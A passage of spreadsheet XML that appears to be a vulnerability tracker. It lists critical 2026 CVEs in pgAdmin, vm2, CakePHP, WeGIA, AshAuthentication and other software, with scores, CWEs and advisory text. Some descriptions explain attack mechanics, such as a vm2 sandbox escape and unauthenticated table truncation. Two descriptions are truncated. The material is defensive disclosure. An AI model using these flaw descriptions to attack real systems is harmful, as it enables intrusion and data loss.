The fix distinguishes a genuine CGI/WSGI variable from a header-derived one and implicitly trusts only the former. A header-asserted identity is now accepted only when the operator explicitly opts in via WEBSERVER_REMOTE_USER_FROM_HEADER, the request arrives from a peer listed in WEBSERVER_TRUSTED_PROXIES, and, when configured, a shared secret supplied in WEBSERVER_SHARED_SECRET_HEADER matches WEBSERVER_SHARED_SECRET under a constant-time comparison. The trusted-peer check deliberately reads the real socket peer address rather than request.remote_addr, because ProxyFix rewrites the latter from the client-controlled X-Forwarded-For header and would otherwise allow an attacker to claim to be the trusted proxy. As defence in depth, login() now refuses any account whose auth_source is not 'webserver', so a misconfigured trust gate cannot be used to assume an internal or LDAP account.
This issue affects pgAdmin 4: from 6.2 before 9.18.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86863</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92950</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-453</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a sandbox escape vulnerability in the CLI tool that allows attackers to execute arbitrary code in the host Node.js process. Attackers can supply a malicious script file to the vm2 CLI that uses require(__filename) to re-execute itself in the host realm, bypassing sandbox isolation and accessing host modules like fs and child_process.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92950</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15688</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>Mitsubishielectric.Psirt@yd.MitsubishiElectric.co.jp</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Incorrect Implementation of Authentication Algorithm Vulnerability in Mitsubishi Electric GX Works3 and Motion Control Setting allows a local attacker to successfully authenticate even with an invalid block password by executing the affected product and modifying part of the executable module in memory, and thereby may be able to view, tamper with, destroy, or delete control programs.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15688</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79752</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>composer:cakephp/cakephp, composer:cakephp/database</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr">
        <is>
          <t>4.5.12, 4.6.5, 5.1.9, 5.2.14, 5.3.7</t>
        </is>
      </c>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7, FunctionsBuilder::cast, FunctionsBuilder::extract, FunctionsBuilder::datePart, and FunctionsBuilder::dateAdd in src/Database/FunctionsBuilder.php accept user-controlled dataType, part, or unit values and incorporate them into generated SQL as unescaped structural fragments. An application that passes untrusted input to these parameters can permit SQL injection with confidentiality, integrity, and availability impact according to the database connection's privileges. This issue is fixed in versions 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79752</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92943</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Improper validation of certificate with host mismatch in the MQTT client TLS connection layer in AWS IoT Device SDK for Python 1.5.3 through 1.6.0 on Python 3.7 and later might allow an adversary-in-the-middle actor to impersonate the AWS IoT Core endpoint, read device telemetry, and inject arbitrary MQTT messages that the device processes as authentic, via a certificate issued for an unrelated hostname by a certificate authority present in the device trust store.
To remediate this issue, users should upgrade to version 1.6.1.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92943</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93393</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow exists in the TLS transport layer of the MongoDB C Driver when built with the Windows platform TLS backend. A remote endpoint that the client connects to, or an attacker able to impersonate or redirect the client's connection, can cause the driver to write attacker-supplied data outside the bounds of a heap allocation while processing incoming encrypted traffic. No authentication or user interaction is required, because the affected processing occurs before any application-level authentication completes. Successful exploitation may lead to memory corruption in the client process, disclosure of adjacent heap memory, or termination of the process.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93393</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54670</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-306</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, the contribution request dispatcher in web/html/contribuicao/controller/control.php accepts attacker-controlled nomeClasse and metodo values without a complete controller and method allowlist, exempts sensitive ContribuicaoLogController operations from authentication, and constructs a controller include path without canonical directory containment. An unauthenticated remote attacker can invoke getContribuicoesLogJSON, sincronizarStatus, registrarFaturas, and other sensitive methods to disclose contribution and donation records or trigger financial workflow operations. A traversal-shaped nomeClasse value can also cause require_once to include an accessible PHP or configuration file outside the intended controller directory, exposing source code, credentials, or other sensitive local data. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54670</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54767</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, web/html/socio/sistema/controller/deletar_socios.php exposes an unauthenticated GET endpoint whose chave parameter is checked only against a hardcoded chave_correta value embedded in the public source repository. A remote attacker who obtains that value can reach the endpoint's TRUNCATE TABLE operations for the endereco, pessoafisica, pessoajuridica, and socio tables without an administrative session or application authorization, permanently destroying member and contributor records. The attack requires the affected tables to exist and the web process database account to possess truncation privileges. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54767</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63472</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/core</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr">
        <is>
          <t>3.7.0</t>
        </is>
      </c>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.7.0, ExternalAuthenticationService.createCustomerAndUser in packages/core/src/service/helpers/external-authentication/external-authentication.service.ts selects an existing customer user by emailAddress and attaches a newly presented ExternalAuthenticationMethod without requiring verified to be true. In deployments with a custom external AuthenticationStrategy that forwards an email whose ownership the provider has not verified, an attacker can authenticate with a victim's email and bind the attacker's external identity to the victim's existing account. This can expose orders, addresses, and personal information and permit account changes or orders as the victim. Native-only email and password deployments and external strategies that always require provider-verified email ownership are unaffected, and new-account creation for an unused email remains permitted. This issue is fixed in version 3.7.0.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63472</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76949</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Spoofing vulnerability in team-alembic ash_authentication allows an attacker who can plant a remember-me cookie in a victim's browser to replace that victim's authenticated session with one for the attacker's own account.
AshAuthentication.Plug.Helpers.sign_in_using_remember_me/3 skips re-authenticating an already-signed-in visitor by checking the session for "&lt;subject_name&gt;_token", but store_in_session/2 writes that key only when require_token_presence_for_authentication? is enabled and otherwise writes the bare subject name. At the default setting the guard therefore reads a key that is never written, its already-signed-in branch is unreachable, and the remember-me sign-in runs on every request through the per-request browser pipeline plug. A planted remember-me cookie is consequently honoured even for a visitor holding a live authenticated session, so whatever the victim enters afterwards lands in data the attacker controls. The read path in authenticate_resource_from_session/4 selects the key correctly, so the guard and the reader disagree about which key holds the session.
This issue affects ash_authentication: from 4.10.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76949</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82761</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82761</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85500</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Primary Weakness vulnerability in team-alembic AshAuthentication allows an unconfirmed user to obtain a session, defeating a mandatory email confirmation requirement.
AshAuthentication.Strategy.Password.Actions.check_user/2 decides whether the attribute named by require_confirmed_with is set using a bare is_nil(Map.get(user, value)). When that attribute is not selected on the loaded record Map.get/2 returns %Ash.NotLoaded{}, and when a field policy denies it for the current actor it returns %Ash.ForbiddenField{}. Neither is nil, so the rejection branch is skipped and sign-i
require_confirmed_with is enforced in two places, and neither holds in every configuration. sign_in_with_token and register are checked only inside AshAuthentication.Strategy.Password.Actions, not on the action itself, so any caller that invokes the action directly skips the check. An API layer such as AshGraphql or AshJsonApi invokes the action directly, so this applies to the default configuration. Where a check does run it compares the confirmation attribute against nil. That attribute holds %Ash.NotLoaded{} or %Ash.ForbiddenField{} when it sets select_by_default?: false, when an API layer narrows the read's select, or when a field policy hides it from the sign-in actor. Neither struct is nil, so those configurations read every user as confirmed.
This issue affects ash_authentication: from 4.3.8 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85500</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86533</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>Insufficient Session Expiration vulnerability in team-alembic AshAuthentication and AshAuthentication Phoenix allows a revoked session to remain fully authenticated.
A resource configured with session_identifier :jti and require_token_presence_for_authentication? disabled stores its session value as &lt;jti&gt;:&lt;subject&gt;. The jti is there so that signing out can revoke that one session. Neither reader consults it: AshAuthentication.Plug.Helpers.authenticate_resource_from_session/4 and AshAuthentication.Phoenix.LiveSession.on_mount/4 both split the value with split_identifier/2, discard the jti and pass the bare subject to AshAuthentication.subject_to_user/3, which reloads the record. The token-presence branch of each function does check its token, calling AshAuthentication.TokenResource.Actions.get_token/3 with the jti and the purpose user. Because the revocation record is never read, neither its revoked state nor its expiry constrains the session, so a session captured before sign-out keeps working.
This issue affects ash_authentication: from 4.9.1 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14; ash_authentication_phoenix: from 2.10.0 before 2.17.4 and from 3.0.0-rc.0 before 3.0.0-rc.11.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86533</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88952</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>Improper Authentication vulnerability in team-alembic AshAuthentication allows an attacker to be signed in as another user by linking an OAuth2 identity to an account that is not theirs.
AshAuthentication.Strategy.OAuth2.UserResolver.resolve/3 matches an existing account using the register action's upsert_identity keys, then gates linking the incoming provider identity to it on email_trusted?/2, which reads only the provider's email_verified boolean and never compares the provider's email value with the matched account's email. That gate assumes the account was matched by its email field, so under any other upsert_identity it is vacuous and an attacker presenting their own verified email is attached to, and issued a session for, an account matched on some other attribute. The same unguarded gate applies in OAuth2.SignInPreparation on the registration_enabled? false path, where the account is matched by the sign-in action's read filter instead. The upsert also rewrites the matched account's email to the attacker's address, so later account recovery reaches the attacker rather than the owner.
This issue affects ash_authentication: from 4.14.0 before 4.15.0 and from 5.0.0-rc.10 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88952</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91039</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
